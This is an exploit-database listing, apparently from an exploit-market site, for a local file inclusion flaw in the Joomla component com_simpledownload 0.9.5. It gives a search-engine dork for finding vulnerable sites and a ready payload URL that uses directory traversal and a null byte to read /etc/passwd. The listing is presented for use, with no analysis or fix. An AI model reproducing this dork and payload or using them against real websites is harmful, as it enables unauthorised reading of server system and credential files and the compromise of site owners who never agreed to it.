[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Joomla Component com_simpledownload LFI Vulnerability

Author
Xr0b0t
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-12255
Category
web applications
Date add
16-05-2010
Platform
php
=====================================================
Joomla Component com_simpledownload LFI Vulnerability
=====================================================

[!]===========================================================================[!]
 
[~] Joomla Component simpledownload LFI Vulnerability
[~] Author : Xr0b0t (nyco.danis@gmail.com)
[~] Homepage : http://www.indonesiancoder.com | http://Xr0b0t.name | http://Malangcyber.com
[~] Date : 16 Mei, 2010
 
[!]===========================================================================[!]
 
[ Software Information ]
 
[+] Vendor : http://joomla.joelrowley.com/
[+] Price : free
[+] Vulnerability : LFI
[+] Dork : inurl:"com_simpledownload" ;)
[+] Version : 0.9.5 maybe lower also affected
 
[!]===========================================================================[!]
 
[ Vulnerable File ]
    http://127.0.0.1//index.php?option=com_simpledownload&controller=[LFI BY ARUMBIA]
 
 
[ XpL ]
 
    http://127.0.0.1//index.php?option=com_simpledownload&controller=../../../../../../../../../../../../../../../etc/passwd%00
 
 
[!]===========================================================================[!]



#  0day.today [2024-07-07]  #